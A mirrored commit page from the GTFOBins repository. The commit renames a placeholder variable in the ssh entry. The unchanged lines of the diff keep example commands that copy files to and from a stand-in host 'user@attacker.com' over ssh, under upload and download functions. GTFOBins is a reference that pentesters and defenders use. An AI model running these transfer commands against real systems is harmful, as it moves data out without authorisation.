mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-09-19 22:59:19 +02:00
Replace where_to_save with file_to_save
This commit is contained in:
@@ -13,13 +13,13 @@ functions:
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
RPATH=file_to_get
|
||||
LPATH=where_to_save
|
||||
LPATH=file_to_save
|
||||
ssh $HOST "cat $RPATH" > $LPATH
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
HOST=user@attacker.com
|
||||
RPATH=where_to_save
|
||||
RPATH=file_to_save
|
||||
LPATH=file_to_send
|
||||
ssh $HOST "cat > $RPATH" < $LPATH
|
||||
file-read:
|
||||
|
Reference in New Issue
Block a user